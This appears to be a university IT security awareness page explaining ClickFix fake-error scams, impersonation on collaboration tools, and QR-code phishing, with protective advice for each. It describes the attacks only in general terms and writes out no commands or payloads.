ClickFix scams are a type of social engineering attack that tricks users into unknowingly running malicious commands on their own computers by presenting fake system or browser errors. The victim is manipulated into performing a sequence of actions that bypass standard security measures and install malware.
How a ClickFix Scam Works
The attack typically follows a clever multi-step process that exploits user trust and the desire to “fix” an apparent problem quickly.
  • The Lure: The victim encounters a pop-up message on a malicious or compromised website that mimics a legitimate alert, such as a “Verify you’re human” CAPTCHA, a browser update notification, or an error message (e.g., “Aw, Snap!” or “Word Online extension missing”).
  • The Deception: The prompt provides instructions on how to solve the problem, often involving a “Fix It” or “Copy Fix” button. Clicking this button uses a malicious script to silently copy an obfuscated, harmful command to the user’s clipboard.
  • The Execution: The user is then instructed to open a legitimate system utility, typically the Windows Run dialog box (by pressing Windows + R), paste the clipboard’s content (using Ctrl + V), and press Enter.
  • The Payload: By executing the command, the user inadvertently launches a script that downloads and installs malware, such as information stealers (e.g., Lumma Stealer), remote access trojans (RATs), or other harmful payloads.
Because the user initiates the command themselves using a legitimate system tool, the action often bypasses traditional antivirus and browser security warnings.
How to Protect Yourself
User awareness is the most effective defense against ClickFix scams.
  • Never copy and paste commands from unfamiliar or suspicious sources. No legitimate website or service will ask you to open a system terminal (like Run, PowerShell, or Mac Terminal) and paste code to verify your identity or fix an issue.
  • Close suspicious pop-up windows immediately. If a website displays an unexpected error message or security prompt, do not interact with it. Use the Task Manager (Ctrl + Shift + Esc) to close the browser if necessary.
  • Keep your systems and applications updated. Use reputable antivirus/endpoint protection software that employs behavioral analysis to detect unusual activity, such as suspicious command execution, even if a known malware signature isn’t present.
  • Be cautious with all online interactions. Be wary of urgent language, unexpected security checks, or requests for unusual actions, regardless of how legitimate the page looks.
  • Verify the source of information. If you receive an unexpected notification (e.g., from a bank, social media, or IT support), do not use the links or instructions provided. Instead, navigate directly to the official website or contact the organization through a trusted, known method. 
Collaboration tool impersonation scammers are cybercriminals who exploit business communication platforms (such as Microsoft Teams, Slack, or Zoom) to pose as trusted colleagues, executives, or vendors. Their goal is to deceive employees into performing actions that result in financial loss or the exposure of sensitive information.
How the Scams Work
Scammers leverage the trust and fast-paced nature of collaborative work environments to bypass normal security protocols. The attack typically involves several phases:
  1. Research: Attackers gather information on potential targets (e.g., finance officers, HR staff) and senior executives using public sources like LinkedIn and company websites.
  2. Impersonation: They create fake accounts, spoof email domains, or compromise existing accounts to make their communications appear legitimate. Advanced scammers use AI to clone voices or create deepfake videos of executives to enhance credibility.
  3. The Ask: The scammer contacts the target via a chat message or email, often creating a sense of urgency (“I’m in a meeting and need this done now”) or authority. Common requests include:
    • Initiating a wire transfer to a fraudulent account (known as Business Email Compromise or CEO Fraud).
    • Sharing sensitive data like W-2 forms or login credentials.
    • Clicking on a malicious link that installs malware or leads to a phishing site.
Red Flags and Protection
Identifying these scams can be difficult, as they often lack traditional red flags like spelling errors and are designed to blend into everyday communications.
  • Verify Requests: Always verify urgent or unusual requests through a secondary, trusted communication channel (e.g., call the person’s known phone number or use a different platform).
  • Be Skeptical of Urgency: Scammers use pressure to prevent critical thinking. Legitimate organizations and executives rarely demand immediate action without proper channels.
  • Check the Sender’s Details: Look closely at the email address or username for subtle variations, typosquatting, or look-alike domains (e.g., company.io instead of company.com).
  • Report Suspicious Activity: Promptly report any suspicious communication to abuse@bu.edu.
Quishing (QR code phishing) is a cyberattack using malicious QR codes, often in emails, texts, or physical locations, to trick victims into scanning them, leading to fake login pages to steal credentials, fraudulent apps for malware, or sensitive data theft for identity fraud, bypassing standard email filters by relying on mobile scanning. Attackers embed malicious links in QR codes that look legitimate (like for discounts or HR notices) but redirect users to spoofed sites to harvest personal info, passwords, or install malware.
How it works
  • Delivery: Scammers place QR codes in emails (as images), texts, or even on physical posters/menus, impersonating trusted entities like banks, government, or delivery services.
  • The Lure: The code promises a reward (discount, urgent notice) or appears in a trusted context (like an office breakroom).
  • The Scan: You scan the code with your phone, which hides the malicious URL from email security.
  • The Trap: You land on a fake website or download malware, giving up credentials, financial details, or infecting your device.
Why it’s effective
  • Bypasses filters: Email security can’t inspect the URL inside a QR image.
  • Mobile convenience: Users are accustomed to scanning codes on mobile, often without scrutinizing the URL.
  • Physical context: Codes on posters or menus feel more tangible and trusted.
How to protect yourself
  • Pause before scanning: Don’t scan unexpected QR codes in emails or physical spots.
  • Inspect the source: Check the sender and message for red flags like poor grammar.
  • Verify independently: Be extra skeptical if an email from HR has a QR code, go to the BU.EDU/HR directly, don’t use the code.
  • Use MFA: At BU we use DUO Multi-factor authentication which adds a layer of defense even if credentials are stolen. Make sure to use it whenever you can for your personal accounts! 
  • Be wary of discounts: Be suspicious of offers in unexpected QR codes.